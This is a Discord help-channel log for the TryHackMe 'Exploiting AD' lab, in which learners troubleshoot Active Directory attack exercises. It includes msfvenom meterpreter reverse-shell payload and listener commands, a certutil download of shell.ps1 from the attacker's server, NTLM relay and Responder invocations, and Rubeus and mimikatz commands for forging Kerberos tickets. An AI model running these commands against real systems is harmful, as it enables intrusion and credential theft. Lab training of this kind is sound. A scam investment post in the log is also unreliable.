TargetServer: \thmserver2.za.tryhackme.loc, CaptureServer: \Attack_Box_IP
RpcRemoteFindFirstPrinterChangeNotificationEx failed.Error Code 1722 - The RPC
server is unavailable.

Can you share a screenshot of what you tried?

Im guessing its a problem with you impacket but again i cant confirm untill i see a screenshot

Can't send a screenshot currently unless it's dm's.

oh didnt knnow that
btw why

Bot is being changed over.

It worked.
I reset the progress for the room and attempted again.
Once i reached the tgt part i simply moved the files in the mimikatz directory and it worked.

can impacket-ntlmrelayx provide authentication to LDAP? anyone have idea?

for information -. use this syntax 'ldap://10.10.10.10'

Is the room working right? I'm using the Attack Box and SSH into the initial user is delayed then just stops/freezes midway through the first command. I have a Fresh Room reset too.

Hi!! I thing this network is down. I've tried to ping the DC from the Attackbox and from a Kali Machine connected with the ovpn of the network, and I recieve the same response:

$ ping 10.200.125.101
PING 10.200.125.101 (10.200.125.101) 56(84) bytes of data.
From 10.50.122.1 icmp_seq=1 Destination Host Unreachable
From 10.50.122.1 icmp_seq=2 Destination Host Unreachable
From 10.50.122.1 icmp_seq=3 Destination Host Unreachable

125 definetly your subnet?

Yes, It's the one I see in https://tryhackme.com/room/exploitingad as the THMDCIP

I cannot send you a screenshot

Are you on a vm or attackbox?

both, but now in a vm to test it in a different way

Check the pinned posts, I wrote steps to connect

Ok

Ok maybe is in bricked state

Vote to reset

I'd already done it and didn't work

15 or 20 mins ago

Ahhh its a voting, sorry, as I told you, I'd already vote

2/4

After waiting until the network time expires and then start it again, it works

hi all - i'm having some trouble with Task5. When I setup a python web server I cannot download the file to the THMSERVER1. I'm using a kali linux box with OpenVPN connection. Any thoughts?

It seems like data is having trouble communicating over the VPN. When I use the attack box things time out frequently on me....

Using this command from powershell on THMSERVER1: certutil.exe -urlcache -split -f http://vpn-ip/shell.ps1 - note the python web server is running on port 80

from my kali machine i'm able to pull up the web server, so it is working

so i'm not 100% sure what happened but this morning I was able to actually download the shell.ps1 meterpreter file to my windows machine without any issue. Thanks if someone did something to fix that!

I will say though, after having all these problems and having to redo the first 3 tasks repeatedly has given me quite a bit of familiarity in doing them comfortably 🙂

Hi, I have a problem with the golden ticket in the Active Directory exploiting room. I've tried four times with my kali vm and the attackbox but it doesn't work.

Hey everyone
Is there any report made in

How someone was able to compromise AD just by getting onto their network

Meaning got the AD control and did all AD enumeration without being an AD user

I know theres methods of people getting on the network with NON-domain workstations and then creating workstation objects and joinign them to domains. Hers an article of folks getting onto the network and then running responder to gather initial foothold

https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html

in the Breaching AD room they use a tool called Responder that picks up broadcasted packets if SMB signing isn't turned on. From packet you can attempt to crack the password hash and get in without a domain account. This is if i'm reemembering it correctly 😄

Hello, why i cant RDP to THMSERVER2.za.tryhackme.loc with username: phillip.wilkins. Ssh i can connect but no RDP ??
[19:35:02:873] [25424:25425] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[19:35:02:873] [25424:25425] [WARN][com.freerdp.crypto] - CN = THMSERVER2.za.tryhackme.loc
[19:35:02:477] [25424:25425] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Spojení zrušeno druhou stranou
[19:35:02:477] [25424:25425] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[19:35:04:769] [25424:25425] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Spojení zrušeno druhou stranou
[19:35:04:769] [25424:25425] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[19:35:04:769] [25424:25425] [ERROR][com.freerdp.core] - freerdp_post_connect failed
za\phillip.wilkins@THMSERVER2 C:\Users>whoami
za\phillip.wilkins

za\phillip.wilkins@THMSERVER2 C:\Users>hostname
THMSERVER2

za\phillip.wilkins@THMSERVER2 C:\Users>
room: exploitingad , task 6

In Task 2 "Exploiting Permission Delegation", there is mention of THMJMP1, which I believe should be THMWRK1 - in this network room.

You start from thmjmp1, force change the password of a Tier2 admin, which then allows you to authenticate to thmwrk1 as that Tier2 admin.

@dim scaffold The name thmjmp1 does not resolve in this network.

This is where Task 1 starts:
"
For SSH access, you can use the following SSH command:
ssh za.tryhackme.loc\<AD Username>@thmwrk1.za.tryhackme.loc
"

Some of the AD rooms use the 'exploitad' inteface, and some use the 'lateralmovement', and the IP addresses and TLD are different, so I'm guessing that that the THMJMP1 is from the 'lateralmovement' side of things. (And there's also the 'persistad' network interface, so I suppose there are at least 3 distinct AD networks.)

Ah I see what you mean - sounds like a #room-bugs report!

Thanks, @dim scaffold! Good to have confirmation.

Gave +1 Rep to @dim scaffold (current: #337 - 13)

I think THMSERVER1 failed to come back up after trying a "shutdown -r" from meterpreter in Task 5 "Exploiting AD Users" (the keylogger task, migrating to explorer, ...)

About keylogging and Meterpreter, is explorer.exe the only suitable process to migrate to? Are keyboard events only available to this process?

I'm having an issue with Task5. I generated my msfvenom powershell script, copied it to thmserver1, run the one-liner to start msfconsole listener, I run the ps script, I see a thread number appear and then the powershell prompt drops and my listener never receives the callback.

I am running on my own kali machine.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=exploitad LPORT=4444 -f psh -o shell.ps1
sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST exploitad; set LPORT 4444; exploit"

What's this? "LHOST=exploitad" - LHOST should equal your local IP address. It's a confusing typo in the task; sometimes one has to outsmart the task since 'bless 'em', things like this have been reported many times but aren't addressed.

if you do LHOST=exploitad it will put in the IP of that interface

so you could do LHOST=eth0 and it will use the IP on eth0

LHOST = LOCAL host.

Is this implying that I need to do SSH tunneling? I have tried creating the payload and console with just IPs and not the interface names.

Just follow what the room. Tells you to dl

Do

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.50.122.151 LPORT=4444 -f psh -o twep191shell.ps1
sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.50.122.151; set LPORT 4444; exploit"

That's what I did but used my IP instead of the interface name. It gave those 2 commands and the certutil to download it to the machine

which I did. I figured it would be just run the ps1 script with the metasploit console listening

I "figured" it out. I was using psexec.py to connect to the .201 address with the hash. I used evil-winrm and the hash, then ran the powershell script and it worked...

I am upload data from zip file and look like the Users, Domains, OUS, GPOS is 0 what's wrong on my bloodhound ?

look like this network is weird ... i am on xfreerdp session and autologout without when i type something. and check the network broke :

┌──(kali㉿kali)-[~/TryHackMe/ExploitAD]
└─$ nslookup thmdc.za.tryhackme.loc
;; communications error to 10.200.129.101#53: host unreachable
;; communications error to 10.200.129.101#53: host unreachable
;; communications error to 10.200.129.101#53: timed out
;; no servers could be reached

┌──(kali㉿kali)-[~/TryHackMe/ExploitAD]
└─$ cat /etc/resolv.conf 
# Generated by NetworkManager
search 1.1.1.1
nameserver 10.200.129.101

My configuration was setup and i was complete TASK 2 To Jump To TIER 2 ADMINS and got the flag1.txt

is the network down ?

wew ... after network restart can finished this room... learn a lot from here ... thx for the room creator

I performed ntlm relay attack with mitm6 and ntlmrelayx. I used mitm6 for dns spoofing. When the victim sent a query containing where the DHCP is located, I identified myself as the DHCP server. Then I became proxy with WPAD so victim makes any http request through me. I responsed 407 authentication for any http request thus I catched NTLM response. Finally I relaied NTLM response to SMB and I gained shell. I got this attack and I performed PoC.

I wonder if this attack is specific to IPv6? I performed same thing for IPv4. I read that mitm6 spoofs dns in IPv4 so I used mitm6 for dns spoofing and then I started ntlmrelayx tool. But I could not catch NTLM response. So it did not work.

After that I decided to use responder for catch NTLM response with this options.
responder -I "eth0" --DHCP --DHCP-DNS -FPw -v

According to my logic, since my goal is to manipulate the WPAD file, I need to takeover DNS, and to announce myself as the DNS, I need to hijack the DHCP server. Therefore, I initiated the Responder tool with the settings mentioned above.Then I started ntlmrelayx tool but again I could not catch NTLM response. I compared to IPv6 and IPv4 attack. I couldn't see 407 status code on wireshark. So why this attack did not work for IPv4?

Working on this room in subnet 12 (DC is 10.200.12.101) and can only ping DC at the moment, is anyone able to check this network?

Hey guys I tried everything including restarting the network and leaving the room, I did everything 3 times from start to finish and it still doesnt work

Task 3: Exploiting Kerberos Delegation

At the end where you type privilege::debug and then kerberos::ptt <TGS> you're supposed to get a response like * File: '<TGS>' OK

But instead Im getting * File: '<TGS>' ERROR kuhl_m_kerberos_ptt_file ; kull_m_file_readData (0x00000002)

SOLVED

When creating TGT and TGS using kekeo, the files were saving in the directory of kekeo (obvious, i know.)

but when I was executing Mimikatz, i first cd'd into the directory of Mimikatz, which caused the problem

Solution: cd into the kekeo directory where the files are, and then execute mimikatz from there using the full path where mimikatz is located.

Hi, I've face some issue with the task 3 of this room. Actually i carefully followed the path but when I received my two TGS (usefull for the PSSESSION) I constantly got the error : " File: 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LO': ERROR ku
hl_m_kerberos_ptt_file ; kull_m_file_readData (0x00000002)" And i can't understand why

@forest stag try this solution #exploiting-ad message

Okay thanks you i will give a try !

You have to do it with the T2 admin user you got in the previous task

I've tried it, i can see tickets saved when running dir but when I start mimikatz from the directory, i can't run kerberos::ptt , the command isn't found ERROR mimikatz_doLocal ; "kerberos:ptt" command of "standard" module not found !

Hey guys those who find .kbdx file in Administrator that file will not work , As someone overwrite Admin database with Trevor local database so in order to find the right .kbdx cd trevor.lical and their you find the right .kbdx file

Hi guys, I'm doing all of the available AD Networks.

At the top of each room, there is a diagram of computers and servers, with the hostname and IP address for each one of them.

How would one find if there are multiple servers and machines in the AD?

for example:

In exploitingad, there is

distributor.za.tryhackme.loc
THMSERVER2
THMWRK1
etc.

How would we find all these machines if the diagram wasn't prepared for us at the top of the room already?

Use bloodhound for that

bloodhound need json file to load the diagram. We still need to loot it using SharpHound.
CMIIW

if you know how bloodhound works it's clear that the sharphound is needed for that ;

hello guys, I have a question about AD, even ad pre-authentication is very important for mitigating replay attacks by adding timestamps.
But how does it mitigate offline bruteforcing too (AS-REP Roasting attacks), can someone correct my understanding, can't the attacker just intercept the very first request (AS-REQ) that the user make which contain a timestamp encrypted with user hash and try to brute force it, and then if he could get the key, he could simply generate another request with another timestamp and encrypt it with that key?

or it just mitigates if there is no man in the middle attacks?

@modest latch - as good reading material on the matter:
https://medium.com/r3d-buck3t/kerberos-attacks-as-rep-roasting-2549fd757b5

Thank you, I will look into it

Gave +1 Rep to @rare bolt (current: #1321 - 2)

Hey there, I'm having trouble with Exploiting AD room. I can't get mimikatz to elevate the token. Looks like I am doing just as it shows on the room but I get error instead of the expected output

mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

as I understand I must be an Administrator to be able to do that

oh.. I got it, must have used all the tasks until this one to stay administrator 🙂

looks like no one alive in here 🙂 no I met this problem that svcServMan password doesn't fit. Did anyone change it?

ya someone change it

someone overwrite Admin database with some other

you need pass? i can

anybody can help me with pdf exploit that the author changed the compiling server and its not functional anyone can fix it?

Hi all, running into an issue on task 2 trying to import TGS from kekeo into mimikatz, anyone able to help please? I have tried with normal token and elevated but still no luck

Ignore above, if anyone has same issue the requests from kekeo are stored in the kekeo directory so you will have to run mimikatz from there or move the files

in exploitingad task 5 , is there something special to do in order to open the kdbx file?

Have you downloaded the file onto the attack box and installed keepass?

I tried multiple ways, I tried on my local machine with keepassxc and keepass2 (kali/linux), keepass (windows), keepass2john & hashcat, I even did rdp on the thmserver1 with the trevor.local account and used the keepass there. Tried the 3 kdbx files. The password was accepted as correct answer on the room webpage. But I don't think I tried the attackbox. Let me try that too.

keepassx on the attackerbox also gives me: "Unable to open the database. Wrong key or database file is corrupt."

I found the issue, the password I used was truncated. I guess I got confused because in the room that truncated password was shown as "correct answer".

thanks for the help

Sorry I have just seen these, no worries, glad you solved it!

I'd like to ask someone about a real life scenario! If I'm trying to exploit the certificates as we can see in this room, and I'm at the 'Finding Vulnerable Certificate Templates' section, how should I find out which template is vulnerable? Here we've got the number, that it's Template32. But what should I look for to find it out myself? Those parameters given? If yes... should I check every single template one by one to find one, or is there a faster way?

Have you looked at the PSPKI audit tool that is mentioned within the room? I havent used it on job but from looking at the Get-CertRequest function it looks like it can automate the manual aspect of inspecting cert templates for dangerous permissions
"Get-CertRequest - Examines a CA's issued certificates by querying the CA's database. Primary intention is to discover certificate requests that may have abused a certificate template privilege escalation vulnerability."
https://github.com/GhostPack/PSPKIAudit

i had never used attackbox for network , so do i need to do anything for attackbox ,coz i thought u dont need to do anything in attackbox

update:solved

was just about to point you towards the first tasks in the network rooms that go over the setup process for both the attackbox and your own kali vm

The network has been failing for a few days and does not resolve

Did you set the etc resolc.conf file?

yes and apart from that I tried attackbox and it doesn't work either

Check if the link in the task works, nslookup can be annoying.

I also tried the page to generate the credentials and nothing

yall need to teach me how to exploit like that I just started

IDK if what i am doing is right or wrong but i can connect to the network. I am using VM and use nmtui to add the DNS conf manually and restart network config. My VM using wify so my ethernet card can modified to connect to the THM network.

But in some case it lost connection and need to re-config again

can we reset the network>?

ssh za.tryhackme.loc\t2_caroline.dawson@thmwrk1.za.tryhackme.loc
ssh: connect to host thmwrk1.za.tryhackme.loc port 22: No route to host

thanks for sharing the solution

Gave +1 Rep to @tidal owl (current: #561 - 7)

Youre welcome 😊

any solutions can't ping to the THMWRK1 ? tried using both own machine and attackbox

Leave and join again or download new vpn file

Tried everything, but finally fixed it by resetting the network. Thank You!

Working through AD Certificate Tempaltes Room on Task 3's last question:
"Which certificate template is misconfigured based on the three provided parameters?"

Has me stumped I have gone onto the target host and run the commands outlined and I do not find the answer "**** *******"

Nm I got it

BF for the win

Hi

How to fix it

access is denied

I need to exploit THMSERVER1 First right?

I just run SpoolSamle.exe in THMWRK1

I'm still waiting for help

Its been 4 days.
You still need help?

I get it

when I reset the AD network then it works

I see

guys can someone help me to reset the machine

is stucked and doesn't work

as always

Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:belo.pfx /password:Coobll123! /outfile:fnot /domain:za.tryhackme.loc /dc:10.200.12.101

[] Action: Ask TGT

[] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN=Belo
[*] Building AS-REQ (w/ PKINIT preauth) for: 'za.tryhackme.loc\Administrator'

[X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP
somebody know how to fix it?

please guys im stucked here, and on internet i cant find any possible solution

https://tenor.com/view/cicciogamer89-gif-26257970

I saw someone with the same error did you manage to fix it?

@glacial stream Hello, sorry for this call, but i read the chat and found you solved the KDC_ERR last year, can you fix this again?

Y, but nothing

I guess their fix is “reset of the machine”

Thanks for the report. Yearly time again to renew all certificates. They are sadly only valid for a year. Will make the update

Gave +1 Rep to @urban nexus (current: #716 - 5)

Thank you so much for your attention!

Gave +1 Rep to @glacial stream (current: #29 - 278)

Hey @glacial stream you solved the issue?

It isn't a quick fix. I need to reimage all of the network images. Otherwise hosts will lose trust with the domain. So I've asked the support team to load my profile into the isolated networks so I can make the changes and image. But it will take time.

Oh, sorry, I had no idea, but thanks for your explanation

Gave +1 Rep to @glacial stream (current: #29 - 279)

For certificate problem this is the steps to make work:

1 - Authenticate to the child domain controller
2 - Run mmc
3 - File -> add snap in
4 - Add the Certificates snap in but make sure to specific for the machine account
5 - View the personal certificates of the DC and see if the Kerberos or Client Authentication cert has expire
6 - If so, say request new certificate
7 - Follow the prompts and enroll for all three available certificates
8 - Retry your kerberos ticket and it should work

In case pin the message

having troubles on network 10.200.77.x connecting via ssh, could we get anyone to reset the network, only need 1 more vote

AD Exploitation - Task 7

Tried the whole setup many times. everything proper whats the issue
[X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP

@glacial stream already mentioned the problem in a previous post. Unfortunately we have to wait for him to renew the certificates. @glacial stream could you post an update, when it's done please? Thank you 🙂

Guys it's not necessary to wait him, you can use admin credentials to login in THMCHILDDC, and renew the certificates. The credentials are in Persisting AD Room task 2.

Thank you, worked!

Gave +1 Rep to @urban nexus (current: #632 - 6)

@urban nexus Thanks for the info, it also worked for me 🙂

Gave +1 Rep to @urban nexus (current: #574 - 7)

Hello all, For Task 5 I have problems how we achieve reverse shell - very similar to @twilit crown #exploiting-ad message
I am having similar problematic executing the powershell on SERVER1.

I am also trying with the exported hashes from SERVER1 to perform Lateral movement from my AttackBox to SERVER1. I used evil-winrm but I have this strange output. Any ideas?

evil-winrm

psexec.py

Hey I was in active directory and using kerbrute "kerbrute userenum -d domain.local -dc ip-addr wordlist.txt" This is not working I have looked at every single documention github page and there is nothing on this issue I am using the latest version as well has anyone faced this as well??idt we can share images or I would've show this

Hi, for task 7 has anyone been able to perform the user impersonation through certificates, using Rubeus? After several reverts, I either receive a 'KDC_ERR_PADATA_TYPE_NOSUPP' or a 'KDC_ERR_C_PRINCIPAL_UNKNOWN' error message from Rubeus. I have tried the Discord channel suggestion of renewing the certificates on the DC, but this further breaks the ability to list certificate templates available for enrollment.

Can confirm that this method solved my issue when attempting to request a TGT with Rubeus. Rubeus just errored with [X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP. I connected to the Child DC and performed the listed steps. Even if the process displays an error, I clicked continue and it generated new certificates. Then I was able to retry and succesffully get my TGT. Thank you.

Gave +1 Rep to @gray quarry (current: #2093 - 1)

I just completed this task. Still having issues?

Glad to help you🙏

inspect your commands and verify filenames. If you follow the guide, you generate fullAdmin.pfx and later the Rubeus example uses vulncert.pfx. it may be as simple as filename.

Still having issues. Contacted support who suggested leaving the room, joining the room, and then regenerating the VPN pack. These steps did not fix the issue for me. I tried changing the filename, encryption parameters, resetting the network more than enough times. I have also tried using certipy-ad, but everything gives me errors. Not sure why the issue would affect just me at this stage, as I am using the same network as everyone else.

i'm on a different vlan than you are. but if you can confirm the childDC has valid certs, the only thing I would suggest are 1) get new user creds. 2) generate the new certificate using a simple password. 3) stay in your directory and call c:\tools\rubeus.exe and reference your cerificate file in the current directory.

Tried another user, but was unable to ssh using a newly generated credential. Did a further generation and could ssh using that user and their credentials. Attempted same tgt request with Rubeus and same error. Command is exactly like that in the task, and the supplied parameters are fine, as Rubeus would complain, for example cert not found, etc. I have the cert, I am able to call Rubeus, it runs without parameter errors, but the resultant output suggests KDC error. If I login to the DC, I can see the certs okay.

Are there any other requirements needed for this task to run, or is it possible to only connect to a new instance of the THMSERVER2 using the generated user from http://distributor.za.tryhackme.loc/creds via SSH/RDP, after adding this user to 'IT Support' AD group via THMWRK1 host access.

Here is the text version of the command I am using:
c:\Tools>Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:C:\Users\christine.hall\Desktop\vulncert.pfx /password:password /outfile:administrator.kirbi /domain:za.tryhackme.loc /dc:10.200.60.101

Fixed the task 7 issue with the KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP error message. Delete all personal certificates on the THMCHILDDC at the x.x.x.101 address (grab credentials from persistingad room) by using mmc and certificates snap-in. Request new certificates and enroll all 4 that are available. I found the multiple certificates causing conflicts with Rubeus, and quite possibly the KDC authentication certificate in particular. Should complete with only 4 personal certificates in the list. Worth checking should other lab users requests multiple certificate enrollments.

im getting this exact error, what should I do to fix this issue? Thanks

Gave +1 Rep to @proven hollow (current: #1399 - 2)

Log on to the DC as administrator, delete all existing certificates, generate new certificates (4 in total). IP address and credentials can be found in the next module in task 2.

thanks that worked

Gave +1 Rep to @proven hollow (current: #1054 - 3)

Hi guys, anyone that can help me with this? - #exploiting-ad message

Using the information in Task 5 - "You have remote code execution on THMSERVER1, use this to get a Meterpreter shell. " - this was not successful when using the Print Spooler bug from THMSERVER2 to THMSERVER1 using NTLMRelay from our AttackBox. Probably because we are in the context of machine account THMSERVER2$, but based on the exercise when we perform RCE through this exploit we are SYSTEM which is strange that the execution of the command on the remote system could execute the payload which I have downloaded on THMSERVER1 using the RCE + certutil. Does anyone knows the reason behind?

I couldn't perform any other RCE, so I needed to use the dumped credentials from THMSERVER1 and use them. I connected using ServerAdmin with evil-winrm to THMSERVER1, downloaded the payload for reverse shell and executed it. Then I had meterpreter.

can anyone tell me why am i not able to download the password.kdbx file from the thmserver1.za.tryhackme.com i have tried it with SYSTEM user as well as trevor i have tried powershell shell and exe shell both it just doesn't want to work i am one the exploiting AD users topic of exploiting active directory room

Try with double slashes everywhere C:\\Users\\whatever

Use quotes when you specify the path or you can also navigate to the specific folder via CD and after just execute download PasswordDatabase.kdbx

@wintry oriole

please do check 132 network subnet against bricked state

Hello, I'm having a problem accessing the network, I waited 20 minutes it wasn't resolve

Same here can’t connect

https://tenor.com/view/anakin-gif-1614955667706199731

Same here we can't access to the network

Hello! I can ping all the machines on the domain besides thmwrk1
Nslookup resolved to the ip of the domain controller, but I can't ssh back into thmwrk1

Subnet 10.200.77.0/24

I made $7,500 from $500 in 3days and I'm willing to teach and guide the first 11 persons on how to do it, but you will have to agree to give me 20% from your profits once you make your profits.
Dm me to get started.

I've restarted the network after hours of waiting, and still can't access the thmwrk1 machine either through OpenVPN or the AttackBox

Okay, so after waiting an hour and a half, I was once again able to ping THMWRK1 and ssh with the credentials.
I once again repeated the instructions in task 2 when I encountered EXACTLY THE SAME ISSUE.
Upon adding my domain user to "IT Support" group, I tried to change the password of a tier 2 admin, but met "Access Denied" again, so I followed the suggestion and exited the ssh connection as I waited for permissions to propagate throughout the domain.
NOW I CAN'T ping thmwrk1, let alone ssh back in.
Please help! Does anyone check these?!

Working now

I am not able to ping any machine even after restarting the network

Hi, I have a problem with my DNS resolution in this room. I've added DC IP to network manager and reset it. Then added "nameserver <DC IP>" in /etc/resolv.conf. The nslookup command works fine and shows proper IP address but I can't reach "http://distributor.za.tryhackme.loc/creds" or any other service via hostname, but via IP address it is pingable. Did I miss something in a configuration :/?

I've used this commands and it worked, if anyone could explain the diffrence I will be thankful :D:
resolvectl dns exploitad <DC IP>
resolvectl domain exploitad za.tryhackme.loc

Let me know if you have a solution regarding this.

Got the solution, You are an admin on that system so you can access the files of other users. Hope this helps.

Eazy add the THMIIS Ip and The Site Domain

How can i get attackbox to get exploitad interface 🧐 i started the room a while ago and wanted to complete it

Reset atb multiple time and leaving room didn’t help

I downloaded the ovpn file for exploitad startet vpn with sudo openvpn file and nothing. normal vpn to thm works

Any ideas

Is that screenshot of the exploitingad VPN or the normal one? It seems to be working

exploitad

Ah yeah I should've seen that myself - Then it should be working though? That output is what a working VPN looks like

Can you explain your issue a bit more?

I tried today and it worked.
With the screen I couldn’t even ping the thmchilddc ip 🤷🏻‍♂️

strange, glad it is working now at least

it feels like these rooms are the best way to learn how to chill between bugs, weird network behaviors, connection loss... [Insert whatever here] 😂

I‘m trying to make it with my own Kali bit now vpn works ntlmrelayx.py won’t 🙄

Looks like pyOpenSSL is missing

It‘s like learning to hack while doing 1st-lvl support 🤣

No way to get it working in the newest kali 🙄

I hate this room trying over 2h to get the attackbox functional and another 2 for kali notebook 🙄

Mr. Biden says: Abide in Persisting AD next. 😉

anyone know whether stuff from previous tasks need to be re-used for all tasks?

No, they shouldn't do.

I was watching Tyler Ramsbeys stream and task 3 appears to need task 2 done to complete task 3

I have not carried on with the other tasks but just wanted to know in case this is a room that needs to be done in one sitting for a specific set of tasks i.e 2-3 4-5 etc

Oh I thought you meant previous rooms

no just tasks

the other rooms were fine. I think this one seems to require a couple of answers from previous tasks which means I guess I need to do it in one sitting 😢

ok someone seems to have removed the flag3.txt from its intended location, seems like some people keep mucking about in this network

Vote to reset.

yep have done, needs another 4 people sadly

considering some of these tasks require steps done in the previous tasks its pretty sad to see people ruining it for others.

hihi does this mean that some THM subscribers are using the same ip address?

hello,,,,is therea way i can find a free proxy?

What is the use-case?

i need to access a particular web platform that is restricted where i am

Then no, we will not be assisting you on this, we won't help you bypass restrictions placed on you

okay..its not an illegal platform. it's actually remotask

It doesn't matter.

okay..nice

can someone please help? Never got stuck like this,
This is room is exploiting AD and I'm in the TIER 2 users and I can run Mimikatz but I cannot run Kekeo and I cannot understand why, I already passed this part but got to go over it again and this time I just can't run it

PS C:\Users\t2_alan.riley> C:\Tools\mimikatz_trunk\x64\mimikatz.exe
 
 .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # exit
Bye!
PS C:\Users\t2_alan.riley> cd .\Desktop\
PS C:\Users\t2_alan.riley\Desktop> C:\Tools\kekeo\x64\kekeo.exe
Program 'kekeo.exe' failed to run: The specified executable is not a valid application for this OS  
platform.At line:1 char:1
+ C:\Tools\kekeo\x64\kekeo.exe
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ C:\Tools\kekeo\x64\kekeo.exe
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed
 
PS C:\Users\t2_alan.riley\Desktop>

maybe stupid, but have you tried to reset it?

When I was completing the AD rooms, I faced some problems which have been fixed with just reset/changing AD network.

Yess I have tried again and it all worked fine, without changing anything.

I also made it work by executing the win version instead of the x64, just by going into the other dir and executing it from there.

Hope it helps who needs it

Hi can anyone help me and tell me why the scripts fails, when i execute it:
root@ip-10-10-172-15:~# python3.9 /opt/impacket/examples/ntlmrelayx.py -smb2support -t smb://10.200.12.201 -debug
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[+] Impacket Library Installation Path: /usr/local/lib/python3.9/dist-packages/impacket
[] Protocol Client IMAPS loaded..
[] Protocol Client IMAP loaded..
[] Protocol Client RPC loaded..
[] Protocol Client DCSYNC loaded..
[] Protocol Client LDAP loaded..
[] Protocol Client LDAPS loaded..
[] Protocol Client SMB loaded..
[] Protocol Client HTTPS loaded..
[] Protocol Client HTTP loaded..
[] Protocol Client SMTP loaded..
[] Protocol Client MSSQL loaded..
[+] Protocol Attack MSSQL loaded..
[+] Protocol Attack SMB loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack RPC loaded..
[] Running in relay mode to single host
Traceback (most recent call last):
File "/opt/impacket/examples/ntlmrelayx.py", line 445, in <module>
c = start_servers(options, threads)
File "/opt/impacket/examples/ntlmrelayx.py", line 203, in start_servers
s = server(c)
File "/usr/local/lib/python3.9/dist-packages/impacket/examples/ntlmrelayx/servers/smbrelayserver.py", line 102, in init
self.server = SMBSERVER((config.interfaceIp,smbport), config_parser = smbConfig)
File "/usr/local/lib/python3.9/dist-packages/impacket/smbserver.py", line 3967, in init
socketserver.TCPServer.init(self, server_address, handler_class)
File "/usr/lib/python3.9/socketserver.py", line 452, in init
self.server_bind()
File "/usr/lib/python3.9/socketserver.py", line 466, in server_bind
self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use

OSError: [Errno 98] Address already in use

you were probably running responder before you ran impacket's ntlmrelayx...w/o changing the config on responder

you were probably running responder before you ran impacket's ntlmrelayx...w/o changing the config on responder

hey , when trying to connect to the exploiting ad dns i got this error using the attack box "systemd-resolve --interface exploitad --set-dns 10.200.60.101 --set-domain za.tryhackme.loc
Failed to resolve interface "exploitad": No such device" someone can maybe help me ?

Please don't post the same message over multiple channels.

Sorry , I didn't knew in which channel to send it

Anyone good at exploiting AD? I have some challenging machines that I am not able to solve. Need some help!

Ensure you're connected to the VPN, and in my version of kali it's now resolvectl dns exploitad 10.200.60.101

Also, why on earth is the domain naming convention for this network different than any of the others

it seems like the bloodhound data from the task may not match what's going on in the exercise... i'll see if I can pull fresh data with sharphound

Word to the wise, when you've got questions like that, be more specific!!! People can help you better if you're forthcoming with your issue and question.

i'm currently trying breachingad
i don't how to solve this

In this room, the URL for obtaining credentials is written as
http://distributor.za.tryhackme.loc/creds
but it was actually https. It needs to be fixed.

Can I just stress do NOT try and complete Exploiting AD in safari browser?

WHO TF GOT IDEA TO GIVE ONE NETWORK TO 5 RANDOM PEOPLE

attackbox systemctl restart dnsmasq

10.50.81.75/24 if someone uses this subnet and doing exploitAD room. Sorry for changing password on t2_melanie davies

password now is : Dupacwela69!

i literally writing with someone powershell commands on one computer

@wraith harbor has been warned.

even though I force the gp update, access is still denied for password change, exploitAD ACEs module

can someone reset the lab please?

Need help on the Exploiting AD room. facing the issue and stuck. would like to know what mistake i am making.
For task 3 Exploiting Kerberos Delegation
As instructed, i am first using the mimikatz.exe to dump the password of the service account based on following sequence of commands:

• mimikatz # token::elevate
• mimikatz # lsadump::secrets
  i get the password for the svcIIS@za.tryhackme.loc
  then exit mimikatz.exe

Start kekeo.exe
run the following commands:

• kekeo # tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:redacted
• kekeo # tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:http/THMSERVER1.za.tryhackme.loc

on another terminal, i start mimikatz and run the following commands:

• mimikatz # privilege::debug
